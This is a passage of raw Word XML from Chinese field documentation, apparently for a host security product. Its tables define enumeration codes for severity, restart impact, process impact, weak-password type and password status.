          <w:p w14:paraId="2ADE3DFB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>中危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7A70B11E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3363D39A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B9861A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="435A4E0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="025FC1C1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5047C3C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C2EC178" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C1156C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>危急</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E98C3B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="555" w:name="_Toc115166350"/>
      <w:bookmarkStart w:id="556" w:name="修复影响"/>
      <w:bookmarkEnd w:id="554"/>
      <w:r>
        <w:t>修复影响</w:t>
      </w:r>
      <w:bookmarkEnd w:id="555"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1275"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5967EF7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598D23F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42C67D0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53B81E1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19137D9B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="035A732A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4000B7F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="769DA6C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="239D4B64" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC6530A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="226C7529" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35D76728" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不需要重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="426D8CBD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6461F758" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D5AD7C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41144A27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20A5578A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FBD0EF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12F31D0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13AE4BF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="021C18F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="557" w:name="_Toc115166351"/>
      <w:bookmarkStart w:id="558" w:name="是否存在进程影响"/>
      <w:bookmarkEnd w:id="556"/>
      <w:r>
        <w:t>是否存在进程影响</w:t>
      </w:r>
      <w:bookmarkEnd w:id="557"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A406BE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AF54D76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FA96A07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21558E4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1BE98CA3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4478272D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>businessImpact</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5083D445" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C733C9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>无进程</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60FF8B5A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69C4F9D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>businessImpact</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44B1A8E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EA8E900" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>有进程影响</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4691DA54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="559" w:name="_Toc115166352"/>
      <w:bookmarkStart w:id="560" w:name="弱密码类型"/>
      <w:bookmarkEnd w:id="558"/>
      <w:r>
        <w:t>弱密码类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="559"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1177"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="60239A2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471B22A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78CCD371" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64D87C40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="46C81AA5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50DDFAD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>weakType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EED3C82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E3733BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>空密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="08B32173" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05B30F00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>weakType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41532B6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EB59F75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>默认弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0CF0745B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B16F95D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>weakType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B6954A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32E16BC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>跟用户名相同</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EF3B327" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FAC9056" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>weakType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A2A25CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DF945B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>常见弱</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="262CB1D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="561" w:name="_Toc115166353"/>
      <w:bookmarkStart w:id="562" w:name="密码状态"/>
      <w:bookmarkEnd w:id="560"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>密码状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="561"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1225"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E3663E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BAE5FD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B9E93F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9E552C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1920A218" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A39CD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC4AA9D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75D21FF3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="527ADD3B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13F72D17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C8991F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B08213" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>将要失效</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56A1E26F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E860177" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05F314B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596D7156" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>已经失效</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="220A27D8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B788F46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pwdStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B1D26D3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="286767E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>已锁定</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AA746E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="563" w:name="_Toc115166354"/>
      <w:bookmarkStart w:id="564" w:name="shell登录性"/>
      <w:bookmarkEnd w:id="562"/>
      <w:r>
        <w:t>shell登录性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="563"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1168"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1305"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="337B9C1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E583062" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1845146B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
